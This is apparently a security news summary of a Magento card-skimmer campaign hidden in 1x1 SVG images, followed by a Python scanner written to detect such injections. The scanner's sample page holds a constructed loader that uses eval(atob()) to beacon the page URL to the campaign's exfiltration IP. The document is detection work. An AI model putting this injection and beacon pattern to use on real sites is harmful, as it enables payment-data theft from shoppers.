A large campaign targeting nearly 100 Magento e-commerce stores injects a credit-card skimmer hidden inside a 1×1-pixel SVG image that executes via an onload handler calling atob(). Researchers at Sansec link the attacks to exploitation of the PolyShell vulnerability and trace exfiltration to IncogNet-hosted domains, urging immediate mitigations and upgrades. #Magento #PolyShell
Keypoints
- Nearly 100 Magento stores were compromised by a skimmer embedded as a 1×1 SVG with an onload handler.
- The onload handler decodes a base64 payload with atob() and executes it inline, so the skimmer never appears as a separate script file or as plaintext JavaScript that security scanners would flag.
- A fake "Secure Checkout" overlay intercepts checkout clicks and validates card and billing details in real time.
- Stolen payment data is XOR-encrypted, base64-obfuscated, and sent to six exfiltration domains hosted at IncogNet (AS40663).
- Sansec attributes the campaign to PolyShell exploitation and recommends removing any SVG whose onload handler calls atob(), checking for the _mgx_cv key in localStorage, blocking 23.137.249.67 and any unfamiliar analytics endpoints, and upgrading Magento.
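A quick way to apply the first two recommendations to a page snapshot is to parse the HTML, pull out every `<svg>` that has an onload attribute, and decode any base64 literal passed to atob() so the payload can be inspected for the indicators above. The scanner below is an added example written for this summary; it is not Sansec's tooling, and the sample page and the decoded payload it contains are constructed here purely so the indicators (the 1×1 size, the `_mgx_cv` key and the 23.137.249.67 address) have something to match. Nothing about the real skimmer's code beyond what the keypoints state is assumed.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Indicators named in the Sansec write-up summarised above.
EXFIL_IP = "23.137.249.67"
STORAGE_KEY = "_mgx_cv"

# Matches atob('...') or atob("...") and captures the base64 literal.
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")


class SvgOnloadCollector(HTMLParser):
    """Collect the attributes of every <svg> element that carries an onload handler."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "svg":
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if "onload" in attrs:
            self.hits.append(attrs)


def decode_atob_literals(handler):
    """Return the decoded text of each base64 literal passed to atob() in a handler string."""
    decoded = []
    for _, b64 in ATOB_RE.findall(handler):
        try:
            decoded.append(base64.b64decode(b64).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append("")  # malformed literal: keep the slot so counts line up
    return decoded


def is_pixel_sized(attrs):
    """True when width and height are both 1 (with or without a px suffix)."""
    def is_one(value):
        return value.strip().lower().removesuffix("px") == "1"
    return is_one(attrs.get("width", "")) and is_one(attrs.get("height", ""))


def scan_html(html):
    """Report every SVG whose onload handler calls atob(), with the decoded payload and IOC matches."""
    parser = SvgOnloadCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.hits:
        handler = attrs["onload"]
        if "atob(" not in handler:
            continue  # plain onload handlers are common and benign
        payload = "\n".join(decode_atob_literals(handler))
        findings.append({
            "pixel_sized": is_pixel_sized(attrs),
            "decoded_payload": payload,
            "references_exfil_ip": EXFIL_IP in payload,
            "sets_storage_marker": STORAGE_KEY in payload,
        })
    return findings


# Constructed stand-in for the skimmer loader (not the real payload): it only
# touches the two indicators the article names so the scanner has matches.
_FAKE_PAYLOAD = (
    "localStorage.setItem('_mgx_cv', Date.now());"
    "new Image().src='https://23.137.249.67/?q='+btoa(document.location.href);"
)
_FAKE_B64 = base64.b64encode(_FAKE_PAYLOAD.encode()).decode()

# Constructed page fragment (not a real capture): one benign SVG, one injected.
SAMPLE_HTML = f"""
<html><body>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="50" onload="this.style.opacity=1"></svg>
<svg width="1" height="1" style="position:absolute" onload="eval(atob('{_FAKE_B64}'))"></svg>
<img src="logo.png" onload="track()">
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run it against saved HTML of the checkout and category pages (the injection may only be served on some paths) and treat any pixel-sized SVG with an atob() handler as a finding even if the decoded payload matches none of the listed indicators, since the exfiltration domains can change without the loader changing.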